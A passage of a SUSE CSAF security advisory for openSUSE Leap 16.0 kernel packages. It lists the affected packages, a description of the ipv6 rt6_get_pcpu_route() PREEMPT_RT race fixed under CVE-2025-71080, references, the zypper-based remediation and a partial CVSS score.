"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
